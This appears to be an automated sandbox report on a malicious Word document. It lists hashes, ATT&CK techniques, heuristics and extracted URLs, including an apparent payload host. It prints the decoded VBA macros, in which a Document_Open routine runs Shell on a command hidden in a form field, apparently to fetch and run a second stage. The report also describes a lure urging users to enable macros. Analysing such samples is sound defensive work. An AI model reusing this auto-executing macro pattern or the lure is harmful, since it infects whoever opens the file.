Office (OLE) malware analysis — malicious · a47e8a10f7d3b572

MALICIOUS

Office (OLE)

94.5 KB Created: 2019-06-19 16:14:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: 987bd2361c0ed6e05400b027c113be44 SHA-1: 8da24bc7e6ec3e2bed82adcc7bb43e8609d4ca39 SHA-256: a47e8a10f7d3b572659126d1c2e01ee500010692db3bea1b21a66ea1e5e8f474

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample contains VBA macros, including a Document_Open macro that executes a Shell() command. The UserForm_Activate subroutine within the App1 module attempts to construct a time-based string and then execute it using Shell, likely to download and execute a second-stage payload. The Korean document body lures the user into enabling macros by claiming compatibility issues.

Heuristics 6

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://54.38.127.28/pm4 In document text (OLE body)
- http://t2.symcb.com0In document text (OLE body)
- http://tl.symcd.com0&In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://t1.symcb.com/ThawtePCA.crl0In document text (OLE body)
- http://tl.symcb.com/tl.crl0In document text (OLE body)
- https://www.thawte.com/cps0/In document text (OLE body)
- https://www.thawte.com/repository0WIn document text (OLE body)
- http://tl.symcb.com/tl.crt0In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1216 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1216 bytes
SHA-256: `558f2f14b72435c7f1c1f637c8a4e4ba7e770b6acd9e2afd407ba17fa7f697cd`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub document_open() CallByName App1, "Show", VbMethod End Sub Attribute VB_Name = "App2" Attribute VB_Base = "0{3A51BE10-1D10-4676-8755-29BCE6949829}{D2216111-4A3F-4E69-A6A3-1D50B158CC0A}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "App1" Attribute VB_Base = "0{5F42E5AF-295F-473D-9F8D-BD18367D6AEC}{B294AE94-0368-413E-BE02-85C17A9B9E13}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub UserForm_Activate() On Error Resume Next Dim time time = Format(Now + TimeSerial(0, 0, 24), "hh:mm") Shell Replace(App2.T3.Text, "77:77", time) Unload Me End Sub

SHA-256: 558f2f14b72435c7f1c1f637c8a4e4ba7e770b6acd9e2afd407ba17fa7f697cd

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub document_open()
CallByName App1, "Show", VbMethod

End Sub

Attribute VB_Name = "App2"
Attribute VB_Base = "0{3A51BE10-1D10-4676-8755-29BCE6949829}{D2216111-4A3F-4E69-A6A3-1D50B158CC0A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "App1"
Attribute VB_Base = "0{5F42E5AF-295F-473D-9F8D-BD18367D6AEC}{B294AE94-0368-413E-BE02-85C17A9B9E13}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Activate()
On Error Resume Next
Dim time
time = Format(Now + TimeSerial(0, 0, 24), "hh:mm")


Shell Replace(App2.T3.Text, "77:77", time)
Unload Me
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.